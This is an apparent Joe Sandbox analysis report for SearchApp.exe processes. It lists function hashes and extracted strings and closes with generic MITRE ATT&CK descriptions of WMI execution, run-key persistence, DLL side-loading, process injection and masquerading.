API String ID:
Opcode ID: 25d49cf9c7993ef37169e1c4daf45a2946ff51e25cfff5ed24a9321c4a340899
Instruction ID: e0bf1a619bcf427c1836e82c1d9587dc8327f74f13fb9aa1a0ee01be86462422
Opcode Fuzzy Hash: 25d49cf9c7993ef37169e1c4daf45a2946ff51e25cfff5ed24a9321c4a340899
Instruction Fuzzy Hash: 1BF08C3080D64D8FDB98FF68E8422A57BA0FFA5340F040129E40CC35C1DB76A5A4CB84

Function 00007FF848F20528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af236b83d218a059178c16575a36280548495e988f0cd4033f7cab12cb33780
Instruction ID: ccbe1c756f03d65e4ff325ac8f125c2b8410a59df8486ca12865241d2ee5ec7d
Opcode Fuzzy Hash: 4af236b83d218a059178c16575a36280548495e988f0cd4033f7cab12cb33780
Instruction Fuzzy Hash: F2F0583080D64E8FDB95EF68A4012EA77A0FF55344F04013AE40CC61C2DB3AA5A0CB98

Function 00007FF848F2685C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f8cd164d4b7151a22989c7181f9cdaa37702eb6072cfc4a093efe6078a75e0
Instruction ID: 15d61ce4a6fbf15f68aab6b653f129dfe3f5071cbd162b9722755d1ba0c9803e
Opcode Fuzzy Hash: f5f8cd164d4b7151a22989c7181f9cdaa37702eb6072cfc4a093efe6078a75e0
Instruction Fuzzy Hash: FBE0DF32D4DA4C8FDB55AFA9AC512D877A0FF89308F00026AD44CD71C5E76A5595C30A

Function 00007FF848F21F15 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8da7bd04c52ad97392030a11ef0b79d40eb92c269b6125bcb56d6d9165a0193
Instruction ID: 4f59d68f7131ba56b4261dd1179c48887fe6673bc26f67a4a4e841a9be399fac
Opcode Fuzzy Hash: a8da7bd04c52ad97392030a11ef0b79d40eb92c269b6125bcb56d6d9165a0193
Instruction Fuzzy Hash: 76E09231C4D78E4FD715BF60591A1E97F60FF45300F0905BAE418860C2E769A168C745

Function 00007FF848F281E0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed921fcab6e2c43160f5ecf3e73bc7bff6094e5504136a71555c840a03b1bafa
Instruction ID: 4cdb2de876d4c8b021b46f100ff10fc8f1b52539b7d3ce356f97b1a09af3f4c7
Opcode Fuzzy Hash: ed921fcab6e2c43160f5ecf3e73bc7bff6094e5504136a71555c840a03b1bafa
Instruction Fuzzy Hash: B5E09A3288C94CCFDB54AB29AC012987AA1FB99318F40026AD04CC71C1D72A59A6C319

Function 00007FF848F21C19 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22a23e1247c00fb1d6ccd679e6776e72c2f901f056b29cd182176dfff739317
Instruction ID: ff096f9d6e326beeb77687be9bf6e5f62490e2c2e624435c02b3ff162a353416
Opcode Fuzzy Hash: c22a23e1247c00fb1d6ccd679e6776e72c2f901f056b29cd182176dfff739317
Instruction Fuzzy Hash: 27E0ED3188E3CD8FD716BB2098591E97F70FF02200F4901BAE448C60D3EB69A558C31A

Function 00007FF848F20530 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed17da0d5f8129411324e1d08c13869f47827f4f3c38000bdf2dc80eb84ac87
Instruction ID: b405a98fb43947383b2e47756e1bea8d1ff47b46d2cbab3f236ed9b18f36ef6a
Opcode Fuzzy Hash: aed17da0d5f8129411324e1d08c13869f47827f4f3c38000bdf2dc80eb84ac87
Instruction Fuzzy Hash: 5FF0393080964D8FDB94EF54E4016AA77A0FF55344F000139E41CD25C0DB36A5A0CB98

Function 00007FF848F22536 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5157c84a4b8ca122eae54c51b993d4d923915f6e81f425b49e26e85e1fcd3cdd
Instruction ID: ebd21d3e40b768ff3a7a37d25092f8135a3428c7c5c426e95dd8ebb8e3335066
Opcode Fuzzy Hash: 5157c84a4b8ca122eae54c51b993d4d923915f6e81f425b49e26e85e1fcd3cdd
Instruction Fuzzy Hash: 74F09871D5485E8EDBA4EB28C495BA9B7B1FB58340F5086E6800EE3245DB35AEC58F80

Function 00007FF848F20C61 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8e38b5a632502550583aa5bada7a958ff4e0becb54e7bf281f170907720710
Instruction ID: 174d221b182f06550f7c3bb71d864a880b1d270bf02784882d1c053731361c67
Opcode Fuzzy Hash: 1a8e38b5a632502550583aa5bada7a958ff4e0becb54e7bf281f170907720710
Instruction Fuzzy Hash: 60E08C31E0652D4EDB40EB48E8013EEB770FF85310F8000B1C10CE3181CF3829408B40

Non-executed Functions

Function 00007FF848F206FA Relevance: 15.2, Strings: 12, Instructions: 190COMMON

Download Yara Rule

Strings

N_^U, xrefs: 00007FF848F206FA
N_^X, xrefs: 00007FF848F20712
?N_I, xrefs: 00007FF848F20804
N_^g, xrefs: 00007FF848F2077A
=N_^, xrefs: 00007FF848F20701
|H, xrefs: 00007FF848F207E9
N_^f, xrefs: 00007FF848F20772
8}H, xrefs: 00007FF848F20839
`~H, xrefs: 00007FF848F20859
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
(}H, xrefs: 00007FF848F20829

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID: (}H$8}H$=N_^$?N_I$H}H$N_^U$N_^X$N_^f$N_^g$`~H${H$|H
API String ID: 0-2416682933
Opcode ID: 216282af4b726a1e9a85dceb7807920309846c93526734408ffdc30366ec60d6
Instruction ID: 1b933e9417d8f03bd50c10ca2b46f80563ce8af1a20849c0934c461b88d8dafc
Opcode Fuzzy Hash: 216282af4b726a1e9a85dceb7807920309846c93526734408ffdc30366ec60d6
Instruction Fuzzy Hash: 38510873E0E5864FE21677AC7C161F96B90FF91BA1F5901B7C5488B0CBEA29980583C6

Function 00007FF848F206E0 Relevance: 14.0, Strings: 11, Instructions: 210COMMON

Download Yara Rule

Strings

N_^X, xrefs: 00007FF848F20712
?N_I, xrefs: 00007FF848F20804
N_^g, xrefs: 00007FF848F2077A
=N_^, xrefs: 00007FF848F20701
|H, xrefs: 00007FF848F207E9
N_^f, xrefs: 00007FF848F20772
8}H, xrefs: 00007FF848F20839
`~H, xrefs: 00007FF848F20859
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
(}H, xrefs: 00007FF848F20829

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID: (}H$8}H$=N_^$?N_I$H}H$N_^X$N_^f$N_^g$`~H${H$|H
API String ID: 0-2554485456
Opcode ID: fe3779fb8f51b1bf886a16c8759b82c15019f1fade86d34212de87c5042d6a1e
Instruction ID: f138f8412351a133c2cac24b8dcc2fe2c6da2425ace617ce571dae1ea0f281c8
Opcode Fuzzy Hash: fe3779fb8f51b1bf886a16c8759b82c15019f1fade86d34212de87c5042d6a1e
Instruction Fuzzy Hash: 62511473E0E5864FE21677AC7C161FA6B90FFD16A1F5801B7C5488B0CBEA29980583C9

Function 00007FF848F206A5 Relevance: 14.0, Strings: 11, Instructions: 205COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FF848F206C2
N_^K, xrefs: 00007FF848F206C9
?N_I, xrefs: 00007FF848F20804
N_^g, xrefs: 00007FF848F2077A
|H, xrefs: 00007FF848F207E9
N_^f, xrefs: 00007FF848F20772
8}H, xrefs: 00007FF848F20839
`~H, xrefs: 00007FF848F20859
H}H, xrefs: 00007FF848F20849
{H, xrefs: 00007FF848F207D9
(}H, xrefs: 00007FF848F20829

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID: (}H$8}H$?N_I$H}H$N_^J$N_^K$N_^f$N_^g$`~H${H$|H
API String ID: 0-3450144878
Opcode ID: d6df8bc115383d1355066fab4c46df49a9f36f01f3e1e00e02ae27bfb573bd36
Instruction ID: 867cb232275cc450bc9289828c4298061c1c6647905e123ecd664f9a53ac47a7
Opcode Fuzzy Hash: d6df8bc115383d1355066fab4c46df49a9f36f01f3e1e00e02ae27bfb573bd36
Instruction Fuzzy Hash: 65512573E0E5964FE21577AC7C121F96B90FFD1BA1F2501B7C5488B0CBEA29980A83C5

Function 00007FF848F24DB0 Relevance: 9.1, Strings: 7, Instructions: 337COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F24E42
8XH, xrefs: 00007FF848F24FCE
8XH, xrefs: 00007FF848F24DEC
8XH, xrefs: 00007FF848F24EAC
8XH, xrefs: 00007FF848F250D4
8XH, xrefs: 00007FF848F25018
8XH, xrefs: 00007FF848F2504E

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH
API String ID: 0-2696229484
Opcode ID: 00f6249548046cae9bdb99cf3e9d8fdcb69ec8323c65499db0809d6c13a30a71
Instruction ID: e23c57962d87791e83b9afb26ef6f908064529bc47cba79f9b8fa5200dcdbf0e
Opcode Fuzzy Hash: 00f6249548046cae9bdb99cf3e9d8fdcb69ec8323c65499db0809d6c13a30a71
Instruction Fuzzy Hash: 92C12431D1965ACFEBA8EB68D8506BDB7B1FF59341F1000B9D00DE3292CB79A880CB55

Function 00007FF848F23660 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F2372F
8XH, xrefs: 00007FF848F236A2
8XH, xrefs: 00007FF848F23800
8XH, xrefs: 00007FF848F2384F
8XH, xrefs: 00007FF848F2377B

Memory Dump Source

Source File: 00000020.00000002.2447482346.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f20000_SearchApp.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH
API String ID: 0-2822012881
Opcode ID: 81c7ac93c76aabdc6ca48f4c4fb151239a1fc7044cb4244ba21ad5b6b107847e
Instruction ID: a269c43aa20e2bf335142b191f4a777b64c8d699c1094b2352c5df5ac8ede36a
Opcode Fuzzy Hash: 81c7ac93c76aabdc6ca48f4c4fb151239a1fc7044cb4244ba21ad5b6b107847e
Instruction Fuzzy Hash: 389131B1D196498FCB58EF68D490AEDB7B2FF58301F60017DD04AA7291CB39A881CF51

Analysis Process: SearchApp.exePID: 1252, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F30F8D Relevance: 15.4, Strings: 12, Instructions: 376COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F333BA
8XH, xrefs: 00007FF848F33302
8XH, xrefs: 00007FF848F3334C
8XH, xrefs: 00007FF848F3344A
8XH, xrefs: 00007FF848F33370
8XH, xrefs: 00007FF848F335A6
8XH, xrefs: 00007FF848F333DE
8XH, xrefs: 00007FF848F332DE
8XH, xrefs: 00007FF848F33294
8XH, xrefs: 00007FF848F334FC
8XH, xrefs: 00007FF848F33427
xMH, xrefs: 00007FF848F332BC

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-3127251284
Opcode ID: 1e5e44b9662ed116e1a2515cde6bc99c7b31995feebf31b178d1be6d187369ba
Instruction ID: d2841d7037457a1e98567d631fd6fb68791f56b3fe121196547cb6fa2462c521
Opcode Fuzzy Hash: 1e5e44b9662ed116e1a2515cde6bc99c7b31995feebf31b178d1be6d187369ba
Instruction Fuzzy Hash: DAD13631D1965A9FEB98EB68D8657B8B7B1FF58340F0441BAD00DE3292CF386984CB14

Function 00007FF848F33239 Relevance: 14.1, Strings: 11, Instructions: 310COMMON

Download Yara Rule

Strings

8XH, xrefs: 00007FF848F333BA
8XH, xrefs: 00007FF848F33302
8XH, xrefs: 00007FF848F3334C
8XH, xrefs: 00007FF848F3344A
8XH, xrefs: 00007FF848F33370
8XH, xrefs: 00007FF848F335A6
8XH, xrefs: 00007FF848F333DE
8XH, xrefs: 00007FF848F332DE
8XH, xrefs: 00007FF848F33294
8XH, xrefs: 00007FF848F33427
xMH, xrefs: 00007FF848F332BC

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID: 8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$8XH$xMH
API String ID: 0-677258541
Opcode ID: ba2a0408c8f0fc015c02bf64d5242c187e81c930949f3083a52f1af2ed4bc297
Instruction ID: a60974cef19374fe75a7c1d6820b1c5b5b343c695fe17bb4d97c9b696ae80e8c
Opcode Fuzzy Hash: ba2a0408c8f0fc015c02bf64d5242c187e81c930949f3083a52f1af2ed4bc297
Instruction Fuzzy Hash: 54B14A31D19A5A9FEB98EB68D8657B8B7A1FF54340F0441BAC00DE72D2CF386984CB05

Function 00007FF848F304F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

?M_^, xrefs: 00007FF848F30501

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID: ?M_^
API String ID: 0-1086198800
Opcode ID: 5071693d411feb0115ad57af4821bcefcb630deedbe80e8b2c2bd4c208d4b589
Instruction ID: 5dd4e7e821db67c554f61e9a0e2426be0171b841bf9408f735e122bbbb295c07
Opcode Fuzzy Hash: 5071693d411feb0115ad57af4821bcefcb630deedbe80e8b2c2bd4c208d4b589
Instruction Fuzzy Hash: 5C01803190D65EDFD791FF2898411F67BA0EF41354F04027AE04CCA182EB299555C7A9

Function 00007FF848F32CF8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b11b1bfafb14019b20d831db084467138e4b240d46e8b1172748b49398a477
Instruction ID: ecf63214113e340a120799a80a0d96f79c04a23d93eea94658d6cfa706218b05
Opcode Fuzzy Hash: b4b11b1bfafb14019b20d831db084467138e4b240d46e8b1172748b49398a477
Instruction Fuzzy Hash: 28410471E1895D8FEB94EBA8D895AECB7F1FF59341F40012AD40DE3292DB74A841CB44

Function 00007FF848F31828 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298022c3a52bcc4f49dcfa44ace672fcc84f938e9c3f670bf4ee779e06630fb0
Instruction ID: 8388297b71e4cde389f2704e53124c24f39b444bbe94bd5294129d40643e7e20
Opcode Fuzzy Hash: 298022c3a52bcc4f49dcfa44ace672fcc84f938e9c3f670bf4ee779e06630fb0
Instruction Fuzzy Hash: 1F317E30C0D61E8EE764BB14D8117FDB2A1FF56380F60027BE44E921C1DF396985CA98

Function 00007FF848F32428 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 308374f4ced963e5827e7692947600af88772b3388410d7a49907d74acbe9dd5
Instruction ID: 4e9b6f2af6d070a838ba29f6b9df7a32a8f7714087f4a5825803a87269d84ba3
Opcode Fuzzy Hash: 308374f4ced963e5827e7692947600af88772b3388410d7a49907d74acbe9dd5
Instruction Fuzzy Hash: 95312471E18A1D8EEBE4EB28C8957A9B6A1FF58341F4041F6D00CE2292DF346A84CB45

Function 00007FF848F3186A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fcdd9f21d45c2729e8687309438248699e8e38b529758336178b96fcd7f7319
Instruction ID: fc340ab0c43bd99c787c8cdb0e23d416b5980f8334b4ee8d3fab8d26a7c128da
Opcode Fuzzy Hash: 5fcdd9f21d45c2729e8687309438248699e8e38b529758336178b96fcd7f7319
Instruction Fuzzy Hash: D311F631C0A62D8EDB59EF60D4557FCB2B5EF42341F5010BAE04EA22D2DF396A85CB44

Function 00007FF848F31F5D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c52d0444ccdff8ce7d10f3082fd3b89510f0b7652741189493e82359b7ed312
Instruction ID: b917058a4146266520679d00a272991f7f382e53ab03e7471b98bc6dee89b9fc
Opcode Fuzzy Hash: 4c52d0444ccdff8ce7d10f3082fd3b89510f0b7652741189493e82359b7ed312
Instruction Fuzzy Hash: AAF0C232C0C6899FD345FB3888592ADBFA0FF54380F4400F6E408C71D2EB295999C741

Function 00007FF848F30528 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3ca110eb765dabe4de564119d97e0fcf0e0ce3dde2c4b9cbbf71732c121032
Instruction ID: d05f642b66c6d57f3e13edb417245c83d96141357f861addab91f4ef3f34f2bd
Opcode Fuzzy Hash: 9c3ca110eb765dabe4de564119d97e0fcf0e0ce3dde2c4b9cbbf71732c121032
Instruction Fuzzy Hash: DFF0583080D64E8FDB95EF2494012EA77A0FF55344F04013AE40CD61C2DB39A5A0CB98

Function 00007FF848F31258 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a479be7b3d4d8560b611b8ce8323e3a6f329321b9619bbc144f72fcf3176efc
Instruction ID: 11a64a352f9f09f17e64b7977a0ab5e1239fcb5e80a499e40631ed8a603805a3
Opcode Fuzzy Hash: 6a479be7b3d4d8560b611b8ce8323e3a6f329321b9619bbc144f72fcf3176efc
Instruction Fuzzy Hash: 59F08C3080964D8FDB94EF24D8812A57BA0FFA5340F04006AE40CD3581DB76D5A4CB84

Function 00007FF848F31F15 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143325158c1b4237d086ed6fe97531f533bef92c87360d56c66347d84f5d5af2
Instruction ID: f0ee2b44c185f59ac7195a0e551b38ed0647d3ee8f776ffc9bb5c68c53a290eb
Opcode Fuzzy Hash: 143325158c1b4237d086ed6fe97531f533bef92c87360d56c66347d84f5d5af2
Instruction Fuzzy Hash: B3E09A35C0E68A8FD716BF20895A2E9BF60FF42300F0905FBE448860C2EB689168C742

Function 00007FF848F31C19 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b9de652826686444ea1434d73369fa3ca200db063d88afbbc212702b06f2d0
Instruction ID: fe8e5fdd9df592d38c31dbbf507e4c3499fe32124690d0703402b39d0025c828
Opcode Fuzzy Hash: c9b9de652826686444ea1434d73369fa3ca200db063d88afbbc212702b06f2d0
Instruction Fuzzy Hash: 37E0ED3184E3CD8FDB16AB2048951E97F70FF02240F4901BBE048C61D3EB689568C30A

Function 00007FF848F30530 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260e1a7bd5efe034ea0159154c2db9ec0901359223de34b34586799f09093ccd
Instruction ID: c87b88b3b8ac4201b6cb2e7cbba14cf119d91bae1c53c8fb4e6951eae04bec48
Opcode Fuzzy Hash: 260e1a7bd5efe034ea0159154c2db9ec0901359223de34b34586799f09093ccd
Instruction Fuzzy Hash: F7F0393080960D8FDB94EF14D4016AA77A0FF55344F00013AE41CD21C0DB75E5A0CB98

Function 00007FF848F32536 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd90e8665f51c1c68b18373bfb0e01f764e8a60c8a51f8a86d7da9a3dfefcee
Instruction ID: 4e1adc45006d07748c93926a777161548ba101286bcb101b1e6200326e59866f
Opcode Fuzzy Hash: dcd90e8665f51c1c68b18373bfb0e01f764e8a60c8a51f8a86d7da9a3dfefcee
Instruction Fuzzy Hash: 25F09E75D1495E8FDBA4EB18C495BA9B7B1FB58341F1086E6800DE3245DB34AE858F80

Function 00007FF848F30C61 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2442892131.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f30000_SearchApp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4432d0022507f308532ff0cf62d9a646b8b3d8686f2fb601e7aa926d1c453135
Instruction ID: 1a4c3597b92a89006bb83271186a272d097a504fc88d0ad4e5e30db9f3cc5989
Opcode Fuzzy Hash: 4432d0022507f308532ff0cf62d9a646b8b3d8686f2fb601e7aa926d1c453135
Instruction Fuzzy Hash: A2E0B631A1652D4EDB90EB58A8013EEB771FF95351F8001B2954CE2185CB3869418B45

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

